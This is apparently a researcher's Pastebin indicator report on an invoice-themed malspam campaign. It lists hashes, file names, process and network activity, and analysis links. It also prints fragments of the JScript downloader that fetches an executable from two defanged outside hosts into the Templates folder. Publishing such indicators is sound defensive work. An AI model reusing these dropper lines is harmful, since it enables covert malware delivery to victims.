Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #IOC #OptiData #VR #? #lzh #js #WSH
- https://pastebin.com/MP3kCSSh
- https://radetskiy.wordpress.com/?s=WSH
- shema
- --------------
- email attach(lzh) > js > wsh > get 2URL > %templates%\random.exe
- email_headers
- --------------
- n/a
- email_subjects
- --------------
- "рахунки ТОВ Заря. оплатить до конца недели"
- "Рахунки Богданова за 10е"
- files
- --------------
- SHA-256 a146baacebf4889c153bb28e37b013d09730265e3fa70f5542d9a878cf103ac2
- File name Рахунки до оплати ТОВ СМБ.lzh LHarc 1.x/ARX archive data [lh0]
- File size 86.76 KB
- SHA-256 241851549298ad7fe353c62a6f8e9fa2fdf50a1fb2160bc72588904fe49522c3
- File name QoC5kb2N4?= [CLEAN]
- File size 5.73 KB
- SHA-256 d6995bdfa7e95b5bb1d64931cbeedfb48a5c9b3d76494a1b2d4121fa7a6e25d0
- File name Pax. 00295 10.10.2018p.xls.js
- File size 80.94 KB
- SHA-256 d3a9a5b6f02b8df627d0e792fdd15761a9cefd12f5464466eca30ac90b7b911e
- File name 82371Equipmentthe > [dwrite.exe] !This program cannot be run in DOS mode
- File size 428 KB
- script
- --------------
- var wsh = new ActiveXObject("wscript.shell");
- var path = wsh.SpecialFolders("templates")+"\\"+((Math.random()*999999)+9999|0)+".exe";
- HTTP.Open("GET", "http://sfbotvinnik{.} icu/folua/dwrite.exe", false); HTTP.Send();
- else
- { HTTP.Open("GET", "http://centurionsix{.} website/folua/dwrite.exe", false);
- activity
- **************
- proc
- --------------
- "C:\Windows\System32\WScript.exe" "C:\Users\operator\Desktop\Pax. 00295 10.10.2018p.xls.js"
- "C:\Users\operator\AppData\Roaming\Microsoft\Windows\Templates\658656.exe"
- netwrk
- --------------
- 93.179.68.94 sfbotvinnik{.} icu GET /folua/dwrite.exe HTTP/1.1 Mozilla/4.0
- comp
- --------------
- wscript.exe 2204 93.179.68.94 80 ESTABLISHED
- persist
- --------------
- n/a
- # # #
- https://www.virustotal.com/#/file/a146baacebf4889c153bb28e37b013d09730265e3fa70f5542d9a878cf103ac2/details
- https://www.virustotal.com/#/file/241851549298ad7fe353c62a6f8e9fa2fdf50a1fb2160bc72588904fe49522c3/details
- https://www.virustotal.com/#/file/d6995bdfa7e95b5bb1d64931cbeedfb48a5c9b3d76494a1b2d4121fa7a6e25d0/community
- https://www.virustotal.com/#/file/d3a9a5b6f02b8df627d0e792fdd15761a9cefd12f5464466eca30ac90b7b911e/detection
- https://analyze.intezer.com/#/analyses/a8fa2a81-4187-4b98-bfc9-4b322edf31bc
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement